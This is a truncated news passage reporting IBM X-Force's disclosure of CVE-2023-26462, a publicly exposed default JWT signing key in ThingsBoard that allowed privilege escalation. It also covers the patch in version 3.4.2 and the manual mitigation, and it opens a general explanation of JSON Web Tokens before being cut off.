The vulnerability, identified as CVE-2023-26462, was detected and reported by IBM Security X-Force researchers. Attackers could fake valid requests that would allow them to appear to the system as higher privileged users, with knowledge of that key, which is much easier to obtain.
“Because ThingsBoard allowed the default key to be used without requiring administrators to change it, and because that default key was also exposed publicly in the configuration files, the door was opened for attackers to gain unauthorized access in excess of what is intended,” stated the X-Force researchers in a report.
The flaw was later patched in ThingsBoard version 3.4.2 by establishing a random key for each new installation or by upgrading to version 3.4.2 or later. If administrators are unable to upgrade immediately, they can manually alter the earlier versions’ default signing key in the configuration file or via the admin dashboard.
Insecure Implementation of JSON Web Tokens
JSON Web Token is an internet standard for stateless authentication. It is widely used in mobile and web applications, significantly used if the interactive authentication is impractical, like machine-to-machine or service-to-service communication
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
Read the original article: